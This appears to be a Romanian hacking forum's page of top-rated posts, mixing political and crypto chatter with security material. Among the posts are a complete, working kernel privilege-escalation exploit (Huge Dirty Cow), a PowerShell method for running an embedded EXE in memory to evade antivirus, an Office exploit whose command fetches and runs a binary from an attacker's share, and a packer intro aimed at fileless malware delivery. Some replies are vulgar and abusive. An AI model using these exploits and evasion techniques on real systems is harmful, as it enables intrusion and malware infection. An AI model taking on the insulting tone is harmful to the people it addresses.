Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 12/09/17 in all areas

  1. 18 points
    Mi-am facut si eu blog. Nu o sa scriu prea des, doar asa, din cand in cand... https://nytrosecurity.com/
  2. 8 points
  3. 7 points
    Salut, Ma uitam azi peste modificarile facute de catre "prietenii" de la PSD-ALDE si observ ceva interesant. Este vorba de "Art. 223 Condițiile și cazurile de aplicare a măsurii arestării preventive", alineatul 2. Textul initial: "Măsura arestării preventive a inculpatului poate fi luată şi dacă din probe rezultă suspiciunea rezonabilă că acesta a săvârșit o infracțiune intenționată contra vieții, o infracțiune prin care s-a cauzat vătămarea corporală sau moartea unei persoane, o infracțiune contra securității naționale prevăzută de Codul penal și alte legi speciale, o infracțiune de trafic de droguri, de efectuare de operațiuni ilegale cu precursori sau cu alte produse susceptibile de a avea efecte psihoactive, o infracțiune privind nerespectarea regimului armelor, munițiilor, materialelor nucleare și al materiilor explozive, trafic și exploatarea persoanelor vulnerabile, acte de terorism, spălare a banilor, falsificare de monede, timbre sau de alte valori, șantaj, viol, lipsire de libertate în mod ilegal, evaziune fiscală, ultraj, ultraj judiciar, o infracțiune de corupție, o infracțiune săvârșită prin sisteme informatice sau mijloace de comunicare electronică sau o altă infracțiune pentru care legea prevede pedeapsa închisorii de 5 ani ori mai mare și, pe baza evaluării gravității faptei, a modului și a circumstanțelor de comitere a acesteia, a anturajului și a mediului din care acesta provine, a antecedentelor penale și a altor împrejurări privitoare la persoana acestuia, se constată că privarea sa de libertate este necesară pentru înlăturarea unei stări de pericol pentru ordinea publică." Textul modificat: "Măsura arestării preventive a inculpatului poate fi luată şi dacă din probe rezultă suspiciunea rezonabilă că acesta a săvârșit o infracțiune intenționată contra vieții, o infracțiune prin care s-a cauzat vătămarea corporală sau moartea unei persoane, o infracțiune contra securității naționale prevăzută de Codul penal și alte legi speciale, o infracțiune de trafic de stupefiante, trafic de arme, trafic de persoane, de terorism şi care vizează acte de terorism, falsificare de monede ori alte valori, șantaj, viol, lipsire de libertate, ultraj, ultraj judiciar sau o altă infracțiune comisă cu violență si, cumulativ, pe baza evaluării gravității faptei, a modului și a circumstanțelor de comitere a acesteia, a anturajului și a mediului din care acesta provine, a antecedentelor penale și a altor împrejurări privitoare la persoana acestuia, se constată că privarea sa de libertate este absolut necesară pentru înlăturarea unei stări de pericol concret pentru ordinea publică." Aveti aici un DIFF: Cum ma asteptam, se vede ca lipsesc urmatoarele lucruri: - spalarea banilor - evaziune fiscala - infractiune de coruptie Dar si "infractiune savarsita prin sisteme informatice sau mijloace de comunicare electronica". Cu alte cuvinta, dupa parerea mea de persoana care nu se pricepe in domeniul legal, pentru acele infractiuni nu se va mai aplica arestarea preventiva. Am postat acest lucru pentru ca in cazul in care sunteti acuzati de "infractiuni savarsite prin sisteme informatice", sa aveti in vedere ca (daca va trece legea si probabil va trece), nu veti putea fi retinuti. Gasiti aici o colectie de modificari marca PSD: http://media.hotnews.ro/media_server1/document-2017-12-14-22176865-0-transpunere-directiva-nevinovatie-13-dec.pdf
  4. 7 points
    Nu are rost pentru ca esti robot! Mizeria (teenspaidcash) e scam. Daca bagi o donatie de min 10 eur aici si postezi dovada iti voi explica si in detaliu de ce e scam.
  5. 5 points
    Si daca nu va avea lumea motive sa-ti multumeasca, vei oferi vreo muiere din viata ta altora pentru satisfactie alternativa? Pentru ca afirmatii de genul ori se fac de cineva credibil (cu track record in investitii de succes in crypto), insider trading ori insotite de ceva argumente logice. Altfel sunt irelevante, chiar daca wabi are un background si potential interesant.
  6. 4 points
    Parteneriatele Ripple si banci nu prea functioneaza cum crede lumea din cate m-am documentat. Ripple ca si companie ofera tehnologia din spatele blockchain-ului lor bancilor pentru a face settlement mai rapid si mai in siguranta. Asta nu seamna ca bancile se apuca si cumpara tokenul public XRP si il folosesc. Dupa parerea mea cresterea asta XRP e doar hype cum a mai fost si in trecut, pump and dump. Poate gresesc pentru ca nu am facut mult research pe asta dar as zice sa aveti grija cu XRP.
  7. 4 points
    Life of a software developer
  8. 4 points
    What is InfoCon? InfoCon is a community supported, non-commercial archive of all the past hacking related convention material that can be found. https://infocon.org/
  9. 4 points
    https://www.ripstech.com/php-security-calendar-2017/
  10. 3 points
    Salutare, M-am gandit ca poate ajuta pe cineva.Daca va faceti cont pe link-ul: https://my.visualstudio.com/benefits Aveti cateva beneficii, o sa enumar o parte din ele poate este cineva interesat. 1.Professional Development Data Camp - 2 luni subscriptie gratis Pluralsight - 3 luni subscriptie gratis Linux academy - 2 luni gratis si multe altele 2. Tools and features Azure - free account + 200$ credit Visual studio community edition si multe alte tool-uri interesante. Spor la invatat!
  11. 3 points
    Cine dreq se uita la copii care fac galagie? Ca plafon de skill e vaza si nu e frumos de vizionat ca un meci professional. (git gud kid) Ca entertainment e si mai varza. 5 copii care fac galagie intr-un microfon la 3 lei din piata. Nici amuzant nu esti, nici calitate audio nici calitate ca skill in gameplay. Daca vrei sa fii youtuber orienteaza-te pe alt segment sau incearca sa faci lucruri mult mai originale.
  12. 3 points
    Story Save and access docs and photos and music on your own local Pi Cloud server! The best part: you can use it if, or when, the Internet goes down (or if you're in a remote spot & want access to Wikipedia). Oh hey, and if your friend gets one and they live close (*ahem*80ft*ahem*), you can share stuff with them and make your own personal chat line! If enough folks built Pi Cloud servers, we could crowdsource the Internet! That would be an 11/10 on a scale of greatness. With the new models of the Raspberry Pi computer, it's possible and not even expensive! (What! Tell me more!) This tutorial will show you how to set up a short-range (~ 80 ft) WiFi Access Point and a personal web server ('bringin it back to HTML bbies). You can set this up as a (closed) local network only (i.e. your own personal "cloud" backup device), or broadcast it to the rest of the world! (..if you do this be sure you know network security.) That said, assuming you have a basic knowledge of the Pi, here's the breakdown: Read Time: ~ 40 min Build Time: ~ 60 min (less if you are experienced w/ Linux) Cost: ~ $35 (for the Pi 3) Link: https://www.hackster.io/jenfoxb0t/make-your-pi-a-local-cloud-server-c4f3f1
  13. 3 points
    Se considera si fara diploma de facultate?
  14. 3 points
    Cu ochii inchisi mi-as fi pus toate monezile la bataie, problema ii ca nu am, pe faptul ca o vei da in "eu sunt bogat tu esti sarac". Eu iti zic ca Palm Beach face market manipulation cu oameni ca tine si tu vorbesti fix pe invers. Folosind persoana intai singular in mai toate propozitiile. 10% dintr-o medie de 100k $ de caciula, daca poza aia ii a ta ca poate ai copiat-o si pe aia, ori 1000 de clienti face +50btc? Zici ca "nu fac doar MM" dar "iti trebuie +50btc" pe care nu ii ai. WTF?! Tu numesti Inside trading information o subscriere la un email? Numai ca acel "major player" a investiti cu ani lumina inainte si te foloseste pe tine pentru a creaste pretul. La dracu, poate chiar de la el cumperi. Intelegi tontonel, nu tu faci manipulare, tu esti doar o unealta care face pula mare ca a facut si el 100k. Ia sa te vad cum ii inmultesti pe afaceri adevarate nu alidropshipping si hype trading. Unde te mai abonezi si ce cursuri iti mai cumperi pentru astea? Nu de alta dar @Che vrea sa isi deschida un cabinet stomatologic si nu stie cum sa inceapa. Sunt gratis cursurile despre SHITCOIN sau trebuie sa platesc? How to make 10000$ in a week trading crypto, price 99.99$. Am facut un copy/paste de pe wiki cu explicatii economice intr-un alt topic. Iti recomand sa citesti pentru a intelege mai exact de ce crescut SHITCOIN si poate vei realiza cum un "major player" controleaza pretul din oferta. Tu si restul haitei de la Palm Beach fiind cererea. P.S. Unde am adus eu in discutie sau am sugerat ca market manipulation ii ilegal pe crypto? Ce cacaturi citesti printre randuri? Totusi iti recomand sa nu prea tii ripple ca nu cumva sa ai surprize de la NYC cu market manipulation.
  15. 2 points
    Stack Based Buffer Overflows on x86 (Windows) – Part I I wrote this article in Romanian, in 2014, and I decided to translate it, because it is a very detailed introduction in the exploitation of a “Stack Based Buffer Overflow” on x86 (32 bits) Windows. Introduction This tutorial is for beginners, but it requires at least some basic knowledge about C/C++ programming in order to understand the concepts. The system that we will use and exploit the vulnerability on is Windows XP (32 bits – x86) for simplicity reasons: there is not DEP and ASLR, things that will be detailed later. I would like to start with a short introduction on assembly (ASM) language. It will not be very detailed, but I will shortly describe the concepts required to understand how a “buffer overflow” vulnerability looks like, and how it can be exploited. There are multiple types of buffer overflows, here we will discuss only the easiest to understand one, stack based buffer overflow. Sursa: https://nytrosecurity.com/2017/12/09/stack-based-buffer-overflows-on-x86-windows-part-i/
  16. 2 points
    Comisia Federala a Comunicatiilor (FCC), arbitrul american al sectorului, s-a pronuntat joi pentru stoparea principiului "neutralitatii netului", care obliga furnizorii de acces la internet sa trateze tot continutul online de aceeasi maniera, scrie AFP. Decizia FCC, care a estimat ca actuala reglementare constituia un obstacol in calea investitiilor, autorizeaza teoretic furnizorii de internet sa moduleze viteza de trafic in functie de continut, ceea ce ar putea conduce la crearea unui "internet cu doua viteze". Partizanii "neutralitatii" se tem ca furnizorii de internet vor fi tentati sa ceara mai multi bani pentru viteze mai mari. FCC "da cheile internatului" unei "maini de companii multimiliardare", a acuzat Mignon Clyburn, membru al FCC care a votat impotriva deciziei. Dezbaterea privind "neutralitatea netului", foarte aprinsa, dureaza de circa zece ani in SUA. Circa o suta de persoane au manifestat joi dimineata in fata sediului FCC, unde au instalat un minimausoleu in memoria internatului "asa cum l-am cunoscut intotdeauna". s More info : http://thehill.com/policy/technology/364887-fcc-votes-to-repeal-net-neutrality-rules
  17. 2 points
    RetDec RetDec is a retargetable machine-code decompiler based on LLVM. The decompiler is not limited to any particular target architecture, operating system, or executable file format: Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code. Supported architectures (32b only): Intel x86, ARM, MIPS, PIC32, and PowerPC. Features: Static analysis of executable files with detailed information. Compiler and packer detection. Loading and instruction decoding. Signature-based removal of statically linked library code. Extraction and utilization of debugging information (DWARF, PDB). Reconstruction of instruction idioms. Detection and reconstruction of C++ class hierarchies (RTTI, vtables). Demangling of symbols from C++ binaries (GCC, MSVC, Borland). Reconstruction of functions, types, and high-level constructs. Integrated disassembler. Output in two high-level languages: C and a Python-like language. Generation of call graphs, control-flow graphs, and various statistics. https://github.com/avast-tl/retdec
  18. 2 points
    In sfarsit! Asteptam de mult asta.Stiam eu ca nu am votat degeaba cu ei.
  19. 2 points
  20. 2 points
    cum era de asteptat s-a facut panic sell la greu ajungand pana la vreo 12 mii :))))) cine a stat pe pozitii culege roadele acu (inclusiv cei care au mai facut buy la 12 mii ) mai pun odata analiza, care a stiut sa profite bravo lui : http://www.newsbtc.com/2017/12/10/bitcoin-price-weekly-analysis-btc-usd-correction-underway/
  21. 2 points
    http://web.archive.org/web/20101224064236/http://codingthewheel.com/archives/how-to-inject-a-managed-assembly-dll
  22. 2 points
    Stii ca esti sarac atunci cand ai doar bani pt ma-sa lu @Okjokes
  23. 2 points
    Chiar ma gandeam ca ar trebui sa te intorci la knowledge sharing Daca vrei o sugestie: schimba numele domeniului. Poate o sa vrei in viitor sa iti faci o firma, iar numele e prea apropiat de Nitro Security (http://www.nitrosecurity.ro/ - firma de paza), si ar fi pacat sa nu iti poti folosi la maxim capitalul de imagine pe care o sa-l acumulezi cu blog-ul. Spor la scris!
  24. 2 points
    @human.b.t.ahttps://github.com/dosomder/iovyroot/issues/16 succes!
  25. 2 points
    M-am cacat pe mine de ras.
  26. 2 points
  27. 1 point
    Up. Aștept noi proiecte. Am programul liber momentan.
  28. 1 point
    @Zatarra, ce preferi: iMac sau garsoniera?
  29. 1 point
    Daca au fraudat alegerile "prin sisteme informatice sau mijloace de comunicare electronica". Safety net oricum, pana la o sentinta de arest preventiv ii cale lunga. Au destule metode si oameni de care se pot folosi. Nu ajungi intr-o functie inalta daca esti curat, detin informatii cu care sa te santajeze. Ce se mai certau acum cativa ani care institutii sa asculte telefoanele si care nu. Zdrente orindare. Edit: Nu merita sa te stresezi. Edit2: Prea multe coincidente. Cum au bagat sistemul de monitorizare a prezentei la vot a si iesit PSD numarul unu, si la locale si la parlamentare. Al dracului ca nu gasesc cine a castigat licitatia pentru soft.
  30. 1 point
  31. 1 point
    "a revenit din nou" ?!?! intrebarea e cand a fost pornit ? ce plm e mizeria aia ?
  32. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  33. 1 point
    Informațiile primite de la voi, cererea de reziliere si suma de 250 de euro (taxa de inscriere).
  34. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  35. 1 point
    https://www.bloomberg.com/news/articles/2017-12-08/the-bitcoin-whales-1-000-people-who-own-40-percent-of-the-market
  36. 1 point
    Am reusit sa scap de ei😀😀😀. Multumesc frumos pentru tot ajutorul!
  37. 1 point
    Salut, am facut un program care posteaza singur in Grupurile de pe Facebook Sunt 3 fisiere : 1. grupuri.txt - aici pui link catre grupuri 2. text.txt - aici va fi textul de postat 3. config.txt - momentan aici se pot seta nr de secunde de asteptat intre postari Astept pareri si ce imbunatatiri sa-i adaug. Inca nu e gata, voi pune link de download cand este gata. Si cred ca o sa-l las pe consola momentan, fara interfata.
  38. 1 point
    https://coin.fyi/portfolio/main-cdc03655512ec1e6 https://coin.fyi/portfolio/main-7bbefbc5e3e1fc66 https://coin.fyi/portfolio/main-5fda1c169094cfbf
  39. 1 point
    cel mai mare bullshit pe care il poti face e sa pui un meci integral. 1. nu-mi pasa ce faci tu pe parcursul jocului 2. daca e un video cu faze pro/amuzante in joc, si e de max 5-6 min, incerc sa ma uit. 3. daca n-ai simtul umorului dar fortezi nota ca sa ai ce pune in video din start inchid. 4. daca tu esti de silver-nova si te filmezi cand omori 3-4-5, te rog eu, verifica rank-ul din nou, de-abia de la MG1 poti spune ca deja ai habar cu ce se mananca. p.s after i seen ya video. ce sa zic, aveti glume de cacat, o voce de cacat, un accent de cacat si era o voce la care chiar nu-mi pot da seama sexul. credeti ca daca spuneti niste lucruri fara sens sau care va vin voua in minte pe moment o sa ne amuzam? am si eu un prieten care se "chinuie" sa se apuce de ramura asta. el forta glumele si amuzamentul doar ca sa aiba ce sa puna, nu e ca si cum el e amuzant intr-un mod natural. Codin de la Creative Monkeyz e amuzant intr-un mod natural, are creativitate si inteligenta emotionala dezvolata, voi n-aveti si va fortati sa scoateti glume pe gura, insa scoateti doar cacat, atat. citit niste carti, dezvoltati-va personal si dupa incercati sa faceti ceva.
  40. 1 point
    Sursa: https://www.google.ro/amp/s/truesecdev.wordpress.com/2016/03/15/embedding-exe-files-into-powershell-scripts/amp/ Fabio Viggiani 2 years ago As sometimes happens, when you solve a particular problem, you realize that the solution can be generalized to cover more scenarios than the one you had in mind. This is one of those stories. I was trying to resolve an issue with creating a pure PowerShell payload as part of a client-side attack. Using PowerShell to run malicious code has many advantages, including: No need to install anything on the target. Very powerful engine underneath (e.g. you can directly invoke .NET code). You can use base64-encoded commands to obfuscate your evil commands, making the attack a little less obvious to spot. This is also a way to avoid escaping all the special characters, especially in advanced attacks involving several steps to deliver the payload. You can use Invoke-Expression to interpret strings as PowerShell commands. From a penetration tester’s perspective, this is very useful to avoid writing complex scripts on disk. For example, you can use PowerShell to download an additional (complex) script, and pipe it directly to Invoke-Expression, which will interpret and execute the downloaded script in memory, within the PowerShell process. This also avoid antivirus detection. The payload I wanted to run on the target included fairly complex functionalities. I had those functionalities as part of an EXE file. I didn’t want to drop the binary on the target system since it could potentially trigger an antivirus. I wanted to use PowerShell, but I didn’t want to rewrite the whole thing in PowerShell. So I came up with a solution. The objective is to embed a binary into a PowerShell script, and run it from within the script without writing it on disk. This is how the solution works: 1. Take your binary file and base64-encode it You can use the following function: function Convert-BinaryToString { [CmdletBinding()] param ( [string] $FilePath ) try { $ByteArray = [System.IO.File]::ReadAllBytes($FilePath); } catch { throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct."; } if ($ByteArray) { $Base64String = [System.Convert]::ToBase64String($ByteArray); } else { throw '$ByteArray is $null.'; } Write-Output -InputObject $Base64String; } 2. Create a new script with the following: The EXE converted to string created in point 1 The function Invoke-ReflectivePEInjection (part of the Powersploit project) Convert the string to byte array Call Invoke-ReflectivePEInjection So basically your binary is just a string in the PowerShell script. Once decoded as a byte array, the function Invoke-ReflectivePEInjection (part of the Powersploit project) will run it in memory within the PowerShell process. The final payload will look something like this: # Your base64 encoded binary $InputString = '...........' function Invoke-ReflectivePEInjection { ...... ...... ...... } # Convert base64 string to byte array $PEBytes = [System.Convert]::FromBase64String($InputString) # Run EXE in memory Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" You can now run the script on the target like this: powershell -ExecutionPolicy Bypass -File payload.ps1 Depending on the binary you embedded, you might get the following error: PE platform doesn't match the architecture of the process it is being loaded in (32/64bit) To fix the issue, simply run the 32 bit PowerShell: %windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File payload.ps1 In the example below, I embedded plink.exe in payload.ps1 Pretty cool, uh?
  41. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  42. 1 point
    am scapat de ripple, bulan maxim (m-a mancat in cur si era sa o sug) mai pun 2 ordine pe anul asta si stau cuminte, succesuri
  43. 1 point
    Dagon - Advanced Hash Manipulation Named after the prince of Hell, Dagon (day-gone) is an advanced hash cracking and manipulation system, capable of bruteforcing multiple hash types, creating bruteforce dictionaries, automatic hashing algorithm verification, random salt generation from Unicode to ASCII, and much more. Note: Dagon comes complete with a Hash Guarantee: I personally guarantee that Dagon will be able to crack your hash successfully. At any point Dagon fails to do so, you will be given a choice to automatically create a Github issue with your hash. Once this issue is created, I will try my best to crack your hash for you. The Github issue is completely anonymous, and no questions will be asked. This is my way of thanking you for using Dagon. There are alternatives to using the automatic issue creator. If you do not want your hash publicly displayed, and feel Dagon has failed you, feel free to create your own issue. Or send an email with the hash information to dagonhashguarantee@gmail.com Screenshots Bruteforcing made easy with a built in wordlist creator if you do not specify one. The wordlist will create 100,000 strings to use Verify what algorithm was used to create that hash you're trying to crack. You can specify to view all possible algorithms by providing the -L flag (some algorithms are not implemented yet) Random salting, unicode random salting, or you can make your own choice on the salt. Demo video Download Preferable you can close the repository with git clone https://github.com/ekultek/dagon.git alternatively you can download the zip or tarball here Basic usage For full functionality of Dagon please reference the homepage here or the user manual python dagon.py -h This will run the help menu and provide a list of all possible flags python dagon.py -c <HASH> --bruteforce This will attempt to bruteforce a given hash python dagon.py -l <FILE-PATH> --bruteforce This will attempt to bruteforce a given file full of hashes (one per line) python dagon.py -v <HASH> This will try to verify the algorithm used to create the hash python dagon.py -V <FILE-PATH> This will attempt to verify each hash in a file, one per line Installation Dagon requires python version 2.7.x to run successfully. git clone https://github.com/ekultek/dagon.git cd Dagon pip install -r requirements.txt This should install all the dependencies that you will need to run Dagon Contributions All contributions are greatly appreciated and helpful. When you contribute you will get your name placed on the homepage underneath contributions with a link to your contribution. You will also get massive respect from me, and that's a pretty cool thing. What I'm looking for in contributions is some of the following: Hashing algorithm creations, specifically; A quicker MD2 algorithm, full Tiger algorithms, Keychain algorithms for cloud and agile More wordlists to download from, please make sure that the link is encoded Rainbow table attack implementation More regular expressions to verify different hash types Source: https://github.com/Ekultek/dagon
  44. 1 point
    If you receive an email that looks like it's from one of your friends, just beware! It's possible that the email has been sent by someone else in an attempt to compromise your system. A security researcher has discovered a collection of vulnerabilities in more than 30 popular email client applications that could allow anyone to send spoofed emails bypassing anti-spoofing mechanisms. Discovered by security researcher Sabri Haddouche, the set of vulnerabilities, dubbed MailSploit, affects Apple Mail (macOS, iOS, and watchOS), Mozilla Thunderbird, several Microsoft email clients, Yahoo Mail, ProtonMail, and others. Although most of these affected email client applications have implemented anti-spoofing mechanisms, such as DKIM and DMARC, MailSploit takes advantage of the way email clients and web interfaces parse "From" header. Email spoofing is an old-school technique, but it works well, allowing someone to modify email headers and send an email with the forged sender address to trick recipients into believing they are receiving that email from a specific person. In a dedicated website went up today, Haddouche explained how the lack of input sanitization implemented by vulnerable email clients could lead to email spoofing attack—without actually exploiting any flaw in DMARC. To demonstrate this attack, Haddouche created a payload by encoding non-ASCII characters inside the email headers, successfully sending a spoofed email from an official address belonging to President of the United States. "Using a combination of control characters such as new lines or null-byte, it can result in hiding or removing the domain part of the original email," Haddouche says in his blog post. "We've seen a lot of malware spreading via emails, relying on social engineering techniques to convince users to open unsafe attachments, or click on phishing links. The rise of ransomware distributed over email clearly demonstrates the effectivity of those mechanisms." Besides spoofing, the researcher found some of the email clients, including Hushmail, Open Mailbox, Spark, and Airmail, are also vulnerable to cross-site scripting (XSS) vulnerabilities, which stems from the email spoofing issue. Haddouche reported this spoofing bug to 33 different client applications, 8 of which have already patched this issue in their products before the public disclosure and 12 are on their way to fix it. Here you can find the list of all email and web clients (both patched and unpatched) that are vulnerable to MailSploit attack. However, Mozilla and Opera consider this bug to be a server-side issue and will not be releasing any patch. Mailbird closed the ticket without responding to the issue, while remaining 12 vendors did not yet comment on the researcher's report. Via thehackernews.com
  45. 1 point
    "Huge Dirty Cow" POC A POC for the Huge Dirty Cow vulnerability (CVE-2017-1000405). Full details can be found here. Before running, make sure to set transparent huge pages to "always": echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled Download HugeDirtyCowPOC-master.zip mirror: // // The Huge Dirty Cow POC. This program overwrites the system's huge zero page. // Compile with "gcc -pthread main.c" // // November 2017 // Bindecy // #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sched.h> #include <string.h> #include <pthread.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #define MAP_BASE ((void *)0x4000000) #define MAP_SIZE (0x200000) #define MEMESET_VAL (0x41) #define PAGE_SIZE (0x1000) #define TRIES_PER_PAGE (20000000) struct thread_args { char *thp_map; char *thp_chk_map; off_t off; char *buf_to_write; int stop; int mem_fd1; int mem_fd2; }; typedef void * (*pthread_proc)(void *); void *unmap_and_read_thread(struct thread_args *args) { char c; int i; for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page. memcpy(&c, args->thp_map + args->off, sizeof(c)); read(args->mem_fd2, &c, sizeof(c)); lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET); usleep(10); // We placed the zero page and marked its PMD as dirty. // Give get_user_pages() another chance before madvise()-ing again. } return NULL; } void *write_thread(struct thread_args *args) { int i; for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET); madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail. write(args->mem_fd1, args->buf_to_write, PAGE_SIZE); } return NULL; } void *wait_for_success(struct thread_args *args) { while (args->thp_chk_map[args->off] != MEMESET_VAL) { madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED); sched_yield(); } args->stop = 1; return NULL; } int main() { struct thread_args args; void *thp_chk_map_addr; int ret; // Mapping base should be a multiple of the THP size, so we can work with the whole huge page. args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (args.thp_map == MAP_FAILED) { perror("[!] mmap()"); return -1; } if (args.thp_map != MAP_BASE) { fprintf(stderr, "[!] Didn't get desired base address for the vulnerable mapping.\n"); goto err_unmap1; } printf("[*] The beginning of the zero huge page: %lx\n", *(unsigned long *)args.thp_map); thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (args.thp_chk_map == MAP_FAILED) { perror("[!] mmap()"); goto err_unmap1; } if (args.thp_chk_map != thp_chk_map_addr) { fprintf(stderr, "[!] Didn't get desired base address for the check mapping.\n"); goto err_unmap2; } ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE); if (ret) { perror("[!] madvise()"); goto err_unmap2; } args.buf_to_write = malloc(PAGE_SIZE); if (!args.buf_to_write) { perror("[!] malloc()"); goto err_unmap2; } memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE); args.mem_fd1 = open("/proc/self/mem", O_RDWR); if (args.mem_fd1 < 0) { perror("[!] open()"); goto err_free; } args.mem_fd2 = open("/proc/self/mem", O_RDWR); if (args.mem_fd2 < 0) { perror("[!] open()"); goto err_close1; } printf("[*] Racing. Gonna take a while...\n"); args.off = 0; // Overwrite every single page while (args.off < MAP_SIZE) { pthread_t threads[3]; args.stop = 0; ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args); ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args); ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args); if (ret) { perror("[!] pthread_create()"); goto err_close2; } pthread_join(threads[0], NULL); // This call will return only after the overwriting is done pthread_join(threads[1], NULL); pthread_join(threads[2], NULL); args.off += PAGE_SIZE; printf("[*] Done 0x%lx bytes\n", args.off); } printf("[*] Success!\n"); err_close2: close(args.mem_fd2); err_close1: close(args.mem_fd1); err_free: free(args.buf_to_write); err_unmap2: munmap(args.thp_chk_map, MAP_SIZE); err_unmap1: munmap(args.thp_map, MAP_SIZE); if (ret) { fprintf(stderr, "[!] Exploit failed.\n"); } return ret; } Source: https://github.com/bindecy/HugeDirtyCowPOC
  46. 1 point
    Microsoft Office - OLE Remote Code Execution Exploit CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882 Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html DEMO PoC exploitation: webdav_exec CVE-2017-11882 A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution. The first command which triggers WebClient service start may look like this: cmd.exe /c start \\attacker_ip\ff Attacker controlled binary path should be a UNC network path: \\attacker_ip\ff\1.exe Usage webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name Sample exploit for CVE-2017-11882 (starting calc.exe as payload) example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system. Download: CVE-2017-11882-master.zip or git clone https://github.com/embedi/CVE-2017-11882.git Mirror: webdav_exec_CVE-2017-11882.py Source
  47. 1 point
    chiar era necesar?:)))
  48. 1 point
    HouseProxy Protect your parents from phishing, HTTP proxy focused on block phishing URL's Install git clone https://github.com/mthbernardes/HouseProxy.git cd HouseProxy/ pip install -r requeriments.txt Config Edit etc/HouseProxy.conf to change de default user and password Create a entry in your DNS to house.proxy Usage $ hug -f index.py $ sudo echo "localhost house.proxy" >> /etc/hosts Set the house.proxy:3128 as your proxy Open the browser and access http://house.proxy:8000 Click in update blacklists It my take a while, the tool is downloading blacklists from phishitank and openphish. Done, now just try to access a malicious URL. Usage recomendation Install it on a raspberry pi, create a network, force all http traffics to pass through the pi on 3128 port (transparent proxy), and connect the clients to this network Download: HouseProxy-master.zip Source: github.com/mthbernardes/
  49. 1 point
    Introducing New Packing Method: First Reflective PE Packer Amber October 24, 2017 Ege Balci Operating System, Research, Tools Because of the increasing security standards inside operating systems and rapid improvements on malware detection technologies today’s malware authors takes advantage of the transparency offered by in-memory execution methods. In-memory execution or fileless execution of a PE file can be defined as executing a compiled PE file inside the memory with manually performing the operations that OS loader supposed to do when executing the PE file normally. In-memory execution of a malware facilitates the obfuscation and anti-emulation techniques. Additionally the malware that is using such methods leaves less footprints on the system since it does not have to possess a file inside the hard drive. Combining in-memory execution methods and multi stage infection models allows malware to infect systems with very small sized loader programs; only purpose of a loader is loading and executing the actual malware code via connecting to a remote system. Using small loader codes are hard to detect by security products because of the purpose and the code fragments of loaders are very common among legitimate applications. Malware that are using this approach can still be detected with scanning the memory and inspecting the behaviors of processes but in terms of security products these operation are harder to implement and costly because of the higher resource usage (Ramilli, 2010[1]). Current rising trend on malware detection technologies is to use the machine learning mechanisms to automate the detection of malwares with feeding very big datasets into the system, as in all machine learning applications this mechanism gets smarter and more accurate in time with absorbing more samples of malware. These mechanisms can feed large numbers of systems that human malware analysts can’t scale. Malware Detection Using Machine Learning[2]paper by Gavriluţ Dragoş from BitDefender Romania Labs widely explains the inner workings of machine learning usage on malware detection. According to the Automatic Analysis of Malware Behavior using Machine Learning[3] paper by Konrad Rieck, with enough data and time false positive results will get close to zero percent and deterministic detection of malware will be significantly effective on new and novel malware samples. The main purpose of this work is developing a new packing methodology for PE files that can alter the way of delivering the malware to the systems. Instead of trying to find new anti-detection techniques that feed the machine learning data-sets, delivering the payload to the systems via fileless code injections directly bypasses most of the security mechanisms. With this new packing method it is possible to convert compiled PE files into multi stage infection payloads that can be used with common software vulnerabilities such as buffer overflows. Known Methods Following techniques are inspiration point of our new packing method. Reflective DLL Injection[4] is a great library injection technique developed by Stephen Fewer and it is the main inspiration point for developing this new packer named as Amber. This technique allows in-memory execution of a specially crafted DLL that is written with reflective programming approach. Because of the adopted reflective programming approach this technique allows multi stage payload deployment. Besides the many advantages of this technique it has few limitations. First limitation is the required file format, this technique expects the malware to be developed or recompiled as a DLL file, and unfortunately in most cases converting an already compiled EXE file to DLL is not possible or requires extensive work on the binary. Second limitation is the need for relocation data. Reflective DLL injection technique requires the relocation data for adjusting the base address of the DLL inside the memory. Also this method has been around for a long time, this means up to date security products can easily detect the usage of Reflective DLL injection. Our new tool, Amber will provide solutions for each of these limitations. 